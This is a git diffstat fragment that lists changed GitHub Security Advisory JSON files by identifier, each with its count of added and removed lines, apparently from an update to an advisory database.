.../05/GHSA-p79r-m85f-v88m/GHSA-p79r-m85f-v88m.json | 8 ++------ .../05/GHSA-p7w3-qmp3-fc84/GHSA-p7w3-qmp3-fc84.json | 8 ++------ .../05/GHSA-p84q-fgj5-q47p/GHSA-p84q-fgj5-q47p.json | 12 +++--------- .../05/GHSA-p8q6-xjj7-f78c/GHSA-p8q6-xjj7-f78c.json | 8 ++------ .../05/GHSA-p99j-3cmf-8pxc/GHSA-p99j-3cmf-8pxc.json | 12 +++--------- .../05/GHSA-pc72-m8vf-j48v/GHSA-pc72-m8vf-j48v.json | 12 +++--------- .../05/GHSA-pfqw-9w76-j32f/GHSA-pfqw-9w76-j32f.json | 8 ++------ .../05/GHSA-pfrg-42vh-vgr3/GHSA-pfrg-42vh-vgr3.json | 8 ++------ .../05/GHSA-pg2p-q27f-4f79/GHSA-pg2p-q27f-4f79.json | 8 ++------ .../05/GHSA-pjv6-3frr-mr92/GHSA-pjv6-3frr-mr92.json | 12 +++--------- .../05/GHSA-pmg7-f4vq-gj32/GHSA-pmg7-f4vq-gj32.json | 12 +++--------- .../05/GHSA-pmqr-xx66-vp2q/GHSA-pmqr-xx66-vp2q.json | 12 +++--------- .../05/GHSA-pp8p-f52f-v8mp/GHSA-pp8p-f52f-v8mp.json | 8 ++------ .../05/GHSA-prrj-cqjg-p2c5/GHSA-prrj-cqjg-p2c5.json | 8 ++------ .../05/GHSA-pv56-xrhc-m887/GHSA-pv56-xrhc-m887.json | 12 +++--------- .../05/GHSA-pvg9-r5h9-jw55/GHSA-pvg9-r5h9-jw55.json | 12 +++--------- .../05/GHSA-pw8x-27cp-qr6j/GHSA-pw8x-27cp-qr6j.json | 8 ++------ .../05/GHSA-pwf5-wh33-96q9/GHSA-pwf5-wh33-96q9.json | 12 +++--------- .../05/GHSA-pwhv-hpq9-gfpf/GHSA-pwhv-hpq9-gfpf.json | 12 +++--------- .../05/GHSA-pxw2-xfhf-fj8w/GHSA-pxw2-xfhf-fj8w.json | 12 +++--------- .../05/GHSA-pxw8-cr7g-xv95/GHSA-pxw8-cr7g-xv95.json | 12 +++--------- .../05/GHSA-q22f-p36h-w3hq/GHSA-q22f-p36h-w3hq.json | 8 ++------ .../05/GHSA-q297-9mxq-hhg9/GHSA-q297-9mxq-hhg9.json | 8 ++------ .../05/GHSA-q2cg-h2mc-rvj3/GHSA-q2cg-h2mc-rvj3.json | 8 ++------ .../05/GHSA-q2w7-cc4g-wqf2/GHSA-q2w7-cc4g-wqf2.json | 12 +++--------- .../05/GHSA-q2xm-ggmm-7g9x/GHSA-q2xm-ggmm-7g9x.json | 8 ++------ .../05/GHSA-q33c-gmxm-rrhg/GHSA-q33c-gmxm-rrhg.json | 8 ++------ .../05/GHSA-q4fm-qwm6-q8fx/GHSA-q4fm-qwm6-q8fx.json | 8 ++------ .../05/GHSA-q4vq-55mw-v867/GHSA-q4vq-55mw-v867.json | 8 ++------ .../05/GHSA-q53h-2rr5-4cff/GHSA-q53h-2rr5-4cff.json | 8 ++------ .../05/GHSA-q59q-qw62-x3cx/GHSA-q59q-qw62-x3cx.json | 8 ++------ .../05/GHSA-q8pp-g2w7-5hpc/GHSA-q8pp-g2w7-5hpc.json | 8 ++------ .../05/GHSA-q8rh-w3fr-95f7/GHSA-q8rh-w3fr-95f7.json | 8 ++------ .../05/GHSA-q99p-55v3-v8hw/GHSA-q99p-55v3-v8hw.json | 12 +++--------- .../05/GHSA-qc72-grw6-qfmg/GHSA-qc72-grw6-qfmg.json | 8 ++------ .../05/GHSA-qcg7-x5r6-58hf/GHSA-qcg7-x5r6-58hf.json | 12 +++--------- .../05/GHSA-qg78-xgfv-hmc9/GHSA-qg78-xgfv-hmc9.json | 12 +++--------- .../05/GHSA-qgr3-m27x-jr59/GHSA-qgr3-m27x-jr59.json | 8 ++------ .../05/GHSA-qhj9-vw2m-88rp/GHSA-qhj9-vw2m-88rp.json | 8 ++------ .../05/GHSA-qhp6-c624-38q5/GHSA-qhp6-c624-38q5.json | 8 ++------ .../05/GHSA-qm25-w56j-5qh8/GHSA-qm25-w56j-5qh8.json | 12 +++--------- .../05/GHSA-qp4g-hr6q-8w69/GHSA-qp4g-hr6q-8w69.json | 12 +++--------- .../05/GHSA-qp4w-3crr-q28r/GHSA-qp4w-3crr-q28r.json | 8 ++------ .../05/GHSA-qp57-c66w-h9pw/GHSA-qp57-c66w-h9pw.json | 8 ++------ .../05/GHSA-qp7j-m6w8-5jjh/GHSA-qp7j-m6w8-5jjh.json | 8 ++------ .../05/GHSA-qpg6-qgf5-9pr8/GHSA-qpg6-qgf5-9pr8.json | 8 ++------ .../05/GHSA-qphj-3vqc-57h9/GHSA-qphj-3vqc-57h9.json | 8 ++------ .../05/GHSA-qqh7-c6g3-7cgg/GHSA-qqh7-c6g3-7cgg.json | 8 ++------ .../05/GHSA-qqqh-wm2v-8949/GHSA-qqqh-wm2v-8949.json | 12 +++--------- .../05/GHSA-qqv2-xmmg-gh3q/GHSA-qqv2-xmmg-gh3q.json | 8 ++------ .../05/GHSA-qr7p-wfwf-hpc9/GHSA-qr7p-wfwf-hpc9.json | 8 ++------ .../05/GHSA-qv8f-prp5-4524/GHSA-qv8f-prp5-4524.json | 8 ++------ .../05/GHSA-qv9r-g2q5-56r8/GHSA-qv9r-g2q5-56r8.json | 8 ++------ .../05/GHSA-qvf9-hh82-8h57/GHSA-qvf9-hh82-8h57.json | 12 +++--------- .../05/GHSA-qwc3-2jvx-f4c4/GHSA-qwc3-2jvx-f4c4.json | 8 ++------ .../05/GHSA-qwfp-wj8c-9pxg/GHSA-qwfp-wj8c-9pxg.json | 8 ++------ .../05/GHSA-qwv6-5f6h-6cg4/GHSA-qwv6-5f6h-6cg4.json | 12 +++--------- .../05/GHSA-qx3h-g3gw-6vrx/GHSA-qx3h-g3gw-6vrx.json | 12 +++--------- .../05/GHSA-qx44-f32h-r3p6/GHSA-qx44-f32h-r3p6.json | 12 +++--------- .../05/GHSA-qxxj-cqjc-mfm3/GHSA-qxxj-cqjc-mfm3.json | 8 ++------ .../05/GHSA-r395-wfp2-8c78/GHSA-r395-wfp2-8c78.json | 8 ++------ .../05/GHSA-r3vw-3h9q-5q3r/GHSA-r3vw-3h9q-5q3r.json | 8 ++------ .../05/GHSA-r3wp-gfpm-rjg8/GHSA-r3wp-gfpm-rjg8.json | 12 +++--------- .../05/GHSA-r4v4-hvh4-c2h8/GHSA-r4v4-hvh4-c2h8.json | 8 ++------ .../05/GHSA-r6w2-wcgh-gxjv/GHSA-r6w2-wcgh-gxjv.json | 8 ++------ .../05/GHSA-r73q-q9rc-v79m/GHSA-r73q-q9rc-v79m.json | 8 ++------ .../05/GHSA-r759-v267-mx9j/GHSA-r759-v267-mx9j.json | 12 +++--------- .../05/GHSA-r84c-ppfc-cj9g/GHSA-r84c-ppfc-cj9g.json | 8 ++------ .../05/GHSA-r879-q82r-5432/GHSA-r879-q82r-5432.json | 8 ++------ .../05/GHSA-r99x-5v7g-2wmf/GHSA-r99x-5v7g-2wmf.json | 12 +++--------- .../05/GHSA-r9gw-49fr-p9j4/GHSA-r9gw-49fr-p9j4.json | 8 ++------ .../05/GHSA-r9hm-xqmv-vp84/GHSA-r9hm-xqmv-vp84.json | 12 +++--------- .../05/GHSA-r9r3-j3f2-cx97/GHSA-r9r3-j3f2-cx97.json | 12 +++--------- .../05/GHSA-r9v5-pj68-rfgc/GHSA-r9v5-pj68-rfgc.json | 8 ++------ .../05/GHSA-rcm3-pv3r-j8p9/GHSA-rcm3-pv3r-j8p9.json | 12 +++--------- .../05/GHSA-rf7m-8c9f-5c53/GHSA-rf7m-8c9f-5c53.json | 8 ++------ .../05/GHSA-rfxv-8ghr-g333/GHSA-rfxv-8ghr-g333.json | 8 ++------ .../05/GHSA-rg6m-38gv-95mx/GHSA-rg6m-38gv-95mx.json | 8 ++------ .../05/GHSA-rh24-rxj5-hccw/GHSA-rh24-rxj5-hccw.json | 8 ++------ .../05/GHSA-rhh5-9h8g-3cxm/GHSA-rhh5-9h8g-3cxm.json | 8 ++------ .../05/GHSA-rjpc-3ppq-gvmj/GHSA-rjpc-3ppq-gvmj.json | 8 ++------ .../05/GHSA-rm2j-qj3x-w2rg/GHSA-rm2j-qj3x-w2rg.json | 8 ++------ .../05/GHSA-rmmm-6vv2-783p/GHSA-rmmm-6vv2-783p.json | 8 ++------ .../05/GHSA-rp6p-jv9g-hhv5/GHSA-rp6p-jv9g-hhv5.json | 12 +++--------- .../05/GHSA-rpfv-8h77-x742/GHSA-rpfv-8h77-x742.json | 8 ++------ .../05/GHSA-rph2-33pr-67ww/GHSA-rph2-33pr-67ww.json | 12 +++--------- .../05/GHSA-rpmx-xcm7-5crg/GHSA-rpmx-xcm7-5crg.json | 12 +++--------- .../05/GHSA-rr66-pqp9-7m9f/GHSA-rr66-pqp9-7m9f.json | 8 ++------ .../05/GHSA-rrfm-6fhw-cr65/GHSA-rrfm-6fhw-cr65.json | 8 ++------ .../05/GHSA-rv5x-2jxm-gf9c/GHSA-rv5x-2jxm-gf9c.json | 8 ++------ .../05/GHSA-rv85-gfr9-mfh9/GHSA-rv85-gfr9-mfh9.json | 8 ++------ .../05/GHSA-rv96-cwm8-v64c/GHSA-rv96-cwm8-v64c.json | 8 ++------ .../05/GHSA-rwmw-fm56-fc54/GHSA-rwmw-fm56-fc54.json | 12 +++--------- .../05/GHSA-rwpv-8qwc-53j8/GHSA-rwpv-8qwc-53j8.json | 8 ++------ .../05/GHSA-rx6w-7424-25q4/GHSA-rx6w-7424-25q4.json | 8 ++------ .../05/GHSA-rx7r-jqpc-3722/GHSA-rx7r-jqpc-3722.json | 8 ++------ .../05/GHSA-v22f-x3qj-f766/GHSA-v22f-x3qj-f766.json | 12 +++--------- .../05/GHSA-v48x-vfq3-xh4h/GHSA-v48x-vfq3-xh4h.json | 8 ++------ .../05/GHSA-v49p-p426-xv6r/GHSA-v49p-p426-xv6r.json | 8 ++------ .../05/GHSA-v4rc-394x-wh8w/GHSA-v4rc-394x-wh8w.json | 12 +++--------- .../05/GHSA-v58p-m8w8-cxg3/GHSA-v58p-m8w8-cxg3.json | 8 ++------ .../05/GHSA-v5cp-96cw-fp58/GHSA-v5cp-96cw-fp58.json | 8 ++------ .../05/GHSA-v77w-qwxx-c96p/GHSA-v77w-qwxx-c96p.json | 8 ++------ .../05/GHSA-v7xj-cjg7-4rfm/GHSA-v7xj-cjg7-4rfm.json | 8 ++------ .../05/GHSA-v82c-prq9-mg8q/GHSA-v82c-prq9-mg8q.json | 12 +++--------- .../05/GHSA-v89m-6q95-4f46/GHSA-v89m-6q95-4f46.json | 12 +++--------- .../05/GHSA-v943-qg78-x777/GHSA-v943-qg78-x777.json | 8 ++------ .../05/GHSA-vc5v-r5xx-gwx3/GHSA-vc5v-r5xx-gwx3.json | 8 ++------ .../05/GHSA-vcm3-7qxc-p6vg/GHSA-vcm3-7qxc-p6vg.json | 8 ++------ .../05/GHSA-vf2p-vgw8-9hvq/GHSA-vf2p-vgw8-9hvq.json | 8 ++------ .../05/GHSA-vfw5-rhwh-5h4p/GHSA-vfw5-rhwh-5h4p.json | 8 ++------ .../05/GHSA-vghj-22mx-4xm6/GHSA-vghj-22mx-4xm6.json | 8 ++------ .../05/GHSA-vgj5-g5f9-3rph/GHSA-vgj5-g5f9-3rph.json | 12 +++--------- .../05/GHSA-vh54-2w7r-mpgf/GHSA-vh54-2w7r-mpgf.json | 8 ++------ .../05/GHSA-vhrq-rr5q-mpp9/GHSA-vhrq-rr5q-mpp9.json | 8 ++------ .../05/GHSA-vjg8-fgcj-ch2g/GHSA-vjg8-fgcj-ch2g.json | 12 +++--------- .../05/GHSA-vjjr-whj3-xg6q/GHSA-vjjr-whj3-xg6q.json | 12 +++--------- .../05/GHSA-vjq5-pjhp-xqm9/GHSA-vjq5-pjhp-xqm9.json | 8 ++------ .../05/GHSA-vjw3-r535-w8h3/GHSA-vjw3-r535-w8h3.json | 8 ++------ .../05/GHSA-vm46-gfgh-2xmw/GHSA-vm46-gfgh-2xmw.json | 12 +++--------- .../05/GHSA-vmf7-g928-8j2x/GHSA-vmf7-g928-8j2x.json | 12 +++--------- .../05/GHSA-vmg6-34cj-3c66/GHSA-vmg6-34cj-3c66.json | 8 ++------ .../05/GHSA-vp5v-5fhg-v965/GHSA-vp5v-5fhg-v965.json | 8 ++------ .../05/GHSA-vpfx-3mh7-rgj3/GHSA-vpfx-3mh7-rgj3.json | 12 +++--------- .../05/GHSA-vpvc-pq35-vhfw/GHSA-vpvc-pq35-vhfw.json | 8 ++------ .../05/GHSA-vrhx-ff8q-5x4m/GHSA-vrhx-ff8q-5x4m.json | 8 ++------ .../05/GHSA-vrv5-gmvc-m6qf/GHSA-vrv5-gmvc-m6qf.json | 8 ++------ .../05/GHSA-vv6f-5rwc-v9p3/GHSA-vv6f-5rwc-v9p3.json | 12 +++--------- .../05/GHSA-vwpr-mjg8-vhm9/GHSA-vwpr-mjg8-vhm9.json | 8 ++------ .../05/GHSA-vwxq-92pg-vg79/GHSA-vwxq-92pg-vg79.json | 8 ++------ .../05/GHSA-vx34-5jq7-vqc8/GHSA-vx34-5jq7-vqc8.json | 8 ++------ .../05/GHSA-vx4w-xwhh-229f/GHSA-vx4w-xwhh-229f.json | 8 ++------ .../05/GHSA-w2fg-wg6f-hgqg/GHSA-w2fg-wg6f-hgqg.json | 8 ++------ .../05/GHSA-w2r7-85q4-6mgr/GHSA-w2r7-85q4-6mgr.json | 12 +++--------- .../05/GHSA-w3gc-6887-36p6/GHSA-w3gc-6887-36p6.json | 12 +++--------- .../05/GHSA-w3j6-q99g-c8w8/GHSA-w3j6-q99g-c8w8.json | 8 ++------ .../05/GHSA-w482-44xc-42x9/GHSA-w482-44xc-42x9.json | 12 +++--------- .../05/GHSA-w488-h6xh-7wj6/GHSA-w488-h6xh-7wj6.json | 8 ++------ .../05/GHSA-w7w3-wc7m-wc88/GHSA-w7w3-wc7m-wc88.json | 8 ++------ .../05/GHSA-w8rf-9fp6-x8cj/GHSA-w8rf-9fp6-x8cj.json | 8 ++------ .../05/GHSA-w8xh-986v-xwgh/GHSA-w8xh-986v-xwgh.json | 8 ++------ .../05/GHSA-w953-754p-r2cj/GHSA-w953-754p-r2cj.json | 8 ++------ .../05/GHSA-wc75-8qh7-7x89/GHSA-wc75-8qh7-7x89.json | 12 +++--------- .../05/GHSA-wccq-42q9-qggj/GHSA-wccq-42q9-qggj.json | 8 ++------ .../05/GHSA-wcq8-87g7-jxwc/GHSA-wcq8-87g7-jxwc.json | 8 ++------ .../05/GHSA-wcv9-8rh4-59p4/GHSA-wcv9-8rh4-59p4.json | 12 +++--------- .../05/GHSA-wf9r-j7xh-v25m/GHSA-wf9r-j7xh-v25m.json | 8 ++------ .../05/GHSA-wfcv-qp56-52h5/GHSA-wfcv-qp56-52h5.json | 12 +++--------- .../05/GHSA-wfm8-qgj5-39hf/GHSA-wfm8-qgj5-39hf.json | 12 +++--------- .../05/GHSA-wfp3-hjq5-f86q/GHSA-wfp3-hjq5-f86q.json | 12 +++--------- .../05/GHSA-wg9c-cg8m-pxx8/GHSA-wg9c-cg8m-pxx8.json | 8 ++------ .../05/GHSA-wgjh-54vp-2362/GHSA-wgjh-54vp-2362.json | 8 ++------ .../05/GHSA-wh5q-mrqr-2xfq/GHSA-wh5q-mrqr-2xfq.json | 8 ++------ .../05/GHSA-wj34-2mf5-qpx4/GHSA-wj34-2mf5-qpx4.json | 12 +++--------- .../05/GHSA-wm6w-5h88-p758/GHSA-wm6w-5h88-p758.json | 12 +++--------- .../05/GHSA-wmc4-xq33-mvv6/GHSA-wmc4-xq33-mvv6.json | 8 ++------ .../05/GHSA-wmx8-5mpf-g7gj/GHSA-wmx8-5mpf-g7gj.json | 8 ++------ .../05/GHSA-wp5h-vrr5-h49g/GHSA-wp5h-vrr5-h49g.json | 12 +++--------- .../05/GHSA-wp7g-r4mw-j38q/GHSA-wp7g-r4mw-j38q.json | 8 ++------ .../05/GHSA-wp9g-5pp9-hxcm/GHSA-wp9g-5pp9-hxcm.json | 8 ++------ .../05/GHSA-wpgm-86gj-6wrw/GHSA-wpgm-86gj-6wrw.json | 8 ++------ .../05/GHSA-wprp-q629-mgxj/GHSA-wprp-q629-mgxj.json | 12 +++--------- .../05/GHSA-wqgf-h892-f3cp/GHSA-wqgf-h892-f3cp.json | 8 ++------ .../05/GHSA-wqv4-fgcf-pxph/GHSA-wqv4-fgcf-pxph.json | 8 ++------ .../05/GHSA-wqw4-vgcc-rj7q/GHSA-wqw4-vgcc-rj7q.json | 12 +++--------- .../05/GHSA-ww3h-3jmp-39vx/GHSA-ww3h-3jmp-39vx.json | 8 ++------ .../05/GHSA-wwcg-g326-fh6q/GHSA-wwcg-g326-fh6q.json | 12 +++--------- .../05/GHSA-wwrw-xchg-gfw3/GHSA-wwrw-xchg-gfw3.json | 8 ++------ .../05/GHSA-wx92-vpj8-mf44/GHSA-wx92-vpj8-mf44.json | 12 +++--------- .../05/GHSA-wx9q-cmfr-g47j/GHSA-wx9q-cmfr-g47j.json | 12 +++--------- .../05/GHSA-wxm5-m389-rfvx/GHSA-wxm5-m389-rfvx.json | 8 ++------ .../05/GHSA-x22x-5jv5-w996/GHSA-x22x-5jv5-w996.json | 12 +++--------- .../05/GHSA-x2fr-7m77-g32f/GHSA-x2fr-7m77-g32f.json | 12 +++--------- .../05/GHSA-x348-x493-xr7c/GHSA-x348-x493-xr7c.json | 8 ++------ .../05/GHSA-x3fr-g2mw-frx8/GHSA-x3fr-g2mw-frx8.json | 8 ++------ .../05/GHSA-x3pq-rg68-hrcp/GHSA-x3pq-rg68-hrcp.json | 8 ++------ .../05/GHSA-x4cj-m7cx-w8jr/GHSA-x4cj-m7cx-w8jr.json | 12 +++--------- .../05/GHSA-x56w-jmgw-h963/GHSA-x56w-jmgw-h963.json | 8 ++------ .../05/GHSA-x588-2pxr-8rpq/GHSA-x588-2pxr-8rpq.json | 8 ++------ .../05/GHSA-x687-p66q-w3j2/GHSA-x687-p66q-w3j2.json | 12 +++--------- .../05/GHSA-x6r5-6r34-p24j/GHSA-x6r5-6r34-p24j.json | 8 ++------ .../05/GHSA-x6v7-57rh-8p7h/GHSA-x6v7-57rh-8p7h.json | 8 ++------ .../05/GHSA-x74m-v27f-v796/GHSA-x74m-v27f-v796.json | 12 +++--------- .../05/GHSA-x8cv-g59m-9p6q/GHSA-x8cv-g59m-9p6q.json | 12 +++--------- .../05/GHSA-x8q6-f6xw-83vw/GHSA-x8q6-f6xw-83vw.json | 12 +++--------- .../05/GHSA-x8wg-7whp-9v2j/GHSA-x8wg-7whp-9v2j.json | 8 ++------ .../05/GHSA-x98r-27wr-8583/GHSA-x98r-27wr-8583.json | 8 ++------ .../05/GHSA-x9fq-wqqx-7x9w/GHSA-x9fq-wqqx-7x9w.json | 8 ++------ .../05/GHSA-xc6c-mh6c-56hr/GHSA-xc6c-mh6c-56hr.json | 8 ++------ .../05/GHSA-xcc2-6x6r-c739/GHSA-xcc2-6x6r-c739.json | 8 ++------ .../05/GHSA-xcj2-pgvr-f289/GHSA-xcj2-pgvr-f289.json | 8 ++------ .../05/GHSA-xcv6-f3m2-4vmf/GHSA-xcv6-f3m2-4vmf.json | 12 +++--------- .../05/GHSA-xcvf-58hp-27qh/GHSA-xcvf-58hp-27qh.json | 8 ++------ .../05/GHSA-xcwh-7pvx-hhg4/GHSA-xcwh-7pvx-hhg4.json | 8 ++------ .../05/GHSA-xgpp-xqc8-gr5w/GHSA-xgpp-xqc8-gr5w.json | 8 ++------ .../05/GHSA-xj6h-22hm-62qq/GHSA-xj6h-22hm-62qq.json | 8 ++------ .../05/GHSA-xjwr-m2j3-wmrh/GHSA-xjwr-m2j3-wmrh.json | 8 ++------ .../05/GHSA-xjxf-3hm4-x63c/GHSA-xjxf-3hm4-x63c.json | 8 ++------ .../05/GHSA-xpm3-hxcq-hjv4/GHSA-xpm3-hxcq-hjv4.json | 12 +++--------- .../05/GHSA-xppp-92mj-4gg6/GHSA-xppp-92mj-4gg6.json | 8 ++------ .../05/GHSA-xqwr-x3rr-v7hv/GHSA-xqwr-x3rr-v7hv.json | 12 +++--------- .../05/GHSA-xwfc-35wf-724m/GHSA-xwfc-35wf-724m.json | 8 ++------ .../05/GHSA-xxg5-rxch-5cr5/GHSA-xxg5-rxch-5cr5.json | 12 +++--------- .../08/GHSA-2475-h6mj-prfm/GHSA-2475-h6mj-prfm.json | 4 +--- .../09/GHSA-6jg8-m9ff-fv96/GHSA-6jg8-m9ff-fv96.json | 4 +--- .../09/GHSA-9xh6-8fcg-f9qm/GHSA-9xh6-8fcg-f9qm.json | 4 +--- .../11/GHSA-8p7h-769g-x7mf/GHSA-8p7h-769g-x7mf.json | 4 +--- .../04/GHSA-fxvw-v786-822p/GHSA-fxvw-v786-822p.json | 4 +--- .../04/GHSA-j5wg-h8jh-fx4v/GHSA-j5wg-h8jh-fx4v.json | 4 +--- .../02/GHSA-2cxh-2c7w-4jcj/GHSA-2cxh-2c7w-4jcj.json | 8 ++------ .../02/GHSA-65x6-qq63-m88g/GHSA-65x6-qq63-m88g.json | 12 +++--------- .../02/GHSA-92wm-282g-vw3w/GHSA-92wm-282g-vw3w.json | 12 +++--------- .../02/GHSA-9pjj-2jvj-24rm/GHSA-9pjj-2jvj-24rm.json | 12 +++--------- .../02/GHSA-c4xm-6jcf-xfq6/GHSA-c4xm-6jcf-xfq6.json | 12 +++--------- .../02/GHSA-fq4x-x6f2-9q95/GHSA-fq4x-x6f2-9q95.json | 12 +++--------- .../02/GHSA-gpw4-cp4w-g7v7/GHSA-gpw4-cp4w-g7v7.json | 8 ++------ .../02/GHSA-jjvv-2q7q-vxj4/GHSA-jjvv-2q7q-vxj4.json | 8 ++------ .../02/GHSA-ph3h-5mmq-2rgv/GHSA-ph3h-5mmq-2rgv.json | 8 ++------ .../02/GHSA-w6wm-9q8x-p5h7/GHSA-w6wm-9q8x-p5h7.json | 8 ++------ .../02/GHSA-xc3w-pcvf-rm7m/GHSA-xc3w-pcvf-rm7m.json | 12 +++--------- .../03/GHSA-27v4-w7r4-68vg/GHSA-27v4-w7r4-68vg.json | 12 +++--------- .../03/GHSA-2fx7-3mgv-p2gp/GHSA-2fx7-3mgv-p2gp.json | 4 +--- .../03/GHSA-2wxc-99ff-4mwq/GHSA-2wxc-99ff-4mwq.json | 4 +--- .../03/GHSA-4649-c6ff-qp3w/GHSA-4649-c6ff-qp3w.json | 4 +--- .../03/GHSA-482p-8mj7-45f7/GHSA-482p-8mj7-45f7.json | 4 +--- .../03/GHSA-5cw3-x746-whwq/GHSA-5cw3-x746-whwq.json | 4 +--- .../03/GHSA-5pmc-hpp2-j3rp/GHSA-5pmc-hpp2-j3rp.json | 4 +--- .../03/GHSA-64wc-qrfg-gh7m/GHSA-64wc-qrfg-gh7m.json | 4 +--- .../03/GHSA-6ggc-x6gh-4w9h/GHSA-6ggc-x6gh-4w9h.json | 4 +--- .../03/GHSA-6p7c-5wg7-g5qx/GHSA-6p7c-5wg7-g5qx.json | 4 +--- .../03/GHSA-792x-pfwg-f6rr/GHSA-792x-pfwg-f6rr.json | 4 +--- .../03/GHSA-894w-vfm7-w5pv/GHSA-894w-vfm7-w5pv.json | 4 +--- .../03/GHSA-8mqv-cx74-94cc/GHSA-8mqv-cx74-94cc.json | 4 +--- .../03/GHSA-92c8-842p-7xgg/GHSA-92c8-842p-7xgg.json | 4 +--- .../03/GHSA-9f3h-j2gr-9v65/GHSA-9f3h-j2gr-9v65.json | 4 +--- .../03/GHSA-9hp2-5m46-r478/GHSA-9hp2-5m46-r478.json | 12 +++--------- .../03/GHSA-f537-cqwj-27gp/GHSA-f537-cqwj-27gp.json | 4 +--- .../03/GHSA-fhrf-5824-hj9w/GHSA-fhrf-5824-hj9w.json | 8 ++------ .../03/GHSA-h74m-whwv-f8j4/GHSA-h74m-whwv-f8j4.json | 8 ++------ .../03/GHSA-j83g-jp4j-gx6g/GHSA-j83g-jp4j-gx6g.json | 4 +--- .../03/GHSA-jr26-5gjf-8mpp/GHSA-jr26-5gjf-8mpp.json | 4 +--- .../03/GHSA-p4wc-mhj4-g4gx/GHSA-p4wc-mhj4-g4gx.json | 4 +--- .../03/GHSA-pr88-vhj7-4qvr/GHSA-pr88-vhj7-4qvr.json | 4 +--- .../03/GHSA-pwrv-jh4g-7cjw/GHSA-pwrv-jh4g-7cjw.json | 4 +--- .../03/GHSA-q7m2-r3xv-fmr3/GHSA-q7m2-r3xv-fmr3.json | 4 +--- .../03/GHSA-rchp-3crp-r2v7/GHSA-rchp-3crp-r2v7.json | 8 ++------ .../03/GHSA-rhj2-38xr-rmqr/GHSA-rhj2-38xr-rmqr.json | 4 +--- .../03/GHSA-vpmw-w5fr-gf3h/GHSA-vpmw-w5fr-gf3h.json | 4 +--- .../03/GHSA-vw49-gvcg-5chv/GHSA-vw49-gvcg-5chv.json | 4 +--- .../03/GHSA-wwgw-w5hw-vm65/GHSA-wwgw-w5hw-vm65.json | 4 +--- .../04/GHSA-8c6w-27gc-g7xg/GHSA-8c6w-27gc-g7xg.json | 4 +--- .../04/GHSA-9243-vfr2-5rcw/GHSA-9243-vfr2-5rcw.json | 4 +--- .../04/GHSA-cxq5-8mc6-xprf/GHSA-cxq5-8mc6-xprf.json | 4 +--- .../04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json | 4 +--- .../04/GHSA-mq9r-62m5-pjc2/GHSA-mq9r-62m5-pjc2.json | 4 +--- .../04/GHSA-pcqx-8h4p-6r69/GHSA-pcqx-8h4p-6r69.json | 4 +--- .../05/GHSA-2277-9x7j-58f3/GHSA-2277-9x7j-58f3.json | 12 +++--------- .../05/GHSA-27rv-f8p8-59gg/GHSA-27rv-f8p8-59gg.json | 12 +++--------- .../05/GHSA-28c9-mq9x-7pcr/GHSA-28c9-mq9x-7pcr.json | 12 +++--------- .../05/GHSA-29rx-6chj-44xc/GHSA-29rx-6chj-44xc.json | 12 +++--------- .../05/GHSA-2hh5-254v-jpf4/GHSA-2hh5-254v-jpf4.json | 12 +++--------- .../05/GHSA-2jv5-59rp-vmgj/GHSA-2jv5-59rp-vmgj.json | 8 ++------ .../05/GHSA-2q2v-mx9w-mg4j/GHSA-2q2v-mx9w-mg4j.json | 8 ++------ .../05/GHSA-2qgr-37h8-x3w9/GHSA-2qgr-37h8-x3w9.json | 12 +++--------- .../05/GHSA-2v93-g9j3-9q9h/GHSA-2v93-g9j3-9q9h.json | 12 +++--------- .../05/GHSA-335x-9j96-mxcr/GHSA-335x-9j96-mxcr.json | 12 +++--------- .../05/GHSA-3375-vg47-m3gm/GHSA-3375-vg47-m3gm.json | 8 ++------ .../05/GHSA-39gw-mq6q-79fw/GHSA-39gw-mq6q-79fw.json | 12 +++--------- .../05/GHSA-3c4w-p6cr-wgq6/GHSA-3c4w-p6cr-wgq6.json | 12 +++--------- .../05/GHSA-3h24-j2vg-3wvf/GHSA-3h24-j2vg-3wvf.json | 8 ++------ .../05/GHSA-3w59-vx6f-4274/GHSA-3w59-vx6f-4274.json | 12 +++--------- .../05/GHSA-3wh6-h4gj-wjr7/GHSA-3wh6-h4gj-wjr7.json | 12 +++--------- .../05/GHSA-4433-jwm9-48r5/GHSA-4433-jwm9-48r5.json | 4 +--- .../05/GHSA-482h-984g-m9qw/GHSA-482h-984g-m9qw.json | 12 +++--------- .../05/GHSA-4h6j-2wpq-2xv2/GHSA-4h6j-2wpq-2xv2.json | 4 +--- .../05/GHSA-4mwj-7h55-4fvc/GHSA-4mwj-7h55-4fvc.json | 12 +++--------- .../05/GHSA-4xq8-m4f5-h82h/GHSA-4xq8-m4f5-h82h.json | 12 +++--------- .../05/GHSA-52m3-99g2-f396/GHSA-52m3-99g2-f396.json | 8 ++------ .../05/GHSA-6239-6f98-f8vf/GHSA-6239-6f98-f8vf.json | 12 +++--------- .../05/GHSA-6h98-v544-xj7q/GHSA-6h98-v544-xj7q.json | 12 +++--------- .../05/GHSA-6pvp-xcj5-pgh8/GHSA-6pvp-xcj5-pgh8.json | 12 +++--------- .../05/GHSA-747f-wh5x-mp2p/GHSA-747f-wh5x-mp2p.json | 12 +++--------- .../05/GHSA-74hg-7r85-vvw3/GHSA-74hg-7r85-vvw3.json | 12 +++--------- .../05/GHSA-7f2x-rjqg-7667/GHSA-7f2x-rjqg-7667.json | 12 +++--------- .../05/GHSA-7r2w-9mrv-hfqg/GHSA-7r2w-9mrv-hfqg.json | 12 +++--------- .../05/GHSA-84wp-3676-5rx2/GHSA-84wp-3676-5rx2.json | 12 +++--------- .../05/GHSA-85h7-g6vm-p392/GHSA-85h7-g6vm-p392.json | 12 +++--------- .../05/GHSA-8cxw-6695-4jq3/GHSA-8cxw-6695-4jq3.json | 12 +++--------- .../05/GHSA-8fm5-v3c4-vrmq/GHSA-8fm5-v3c4-vrmq.json | 12 +++--------- .../05/GHSA-8g98-8rxj-3j4q/GHSA-8g98-8rxj-3j4q.json | 12 +++--------- .../05/GHSA-8q2m-46mc-pjw4/GHSA-8q2m-46mc-pjw4.json | 12 +++--------- .../05/GHSA-8x7q-xp33-2vvh/GHSA-8x7q-xp33-2vvh.json | 4 +--- .../05/GHSA-9h2q-cwg7-7wx8/GHSA-9h2q-cwg7-7wx8.json | 12 +++--------- .../05/GHSA-9rr2-xw5v-w787/GHSA-9rr2-xw5v-w787.json | 12 +++--------- .../05/GHSA-c227-q7j7-xf88/GHSA-c227-q7j7-xf88.json | 12 +++--------- .../05/GHSA-c655-qwvw-wfqm/GHSA-c655-qwvw-wfqm.json | 12 +++--------- .../05/GHSA-ch44-784c-7wgq/GHSA-ch44-784c-7wgq.json | 12 +++--------- 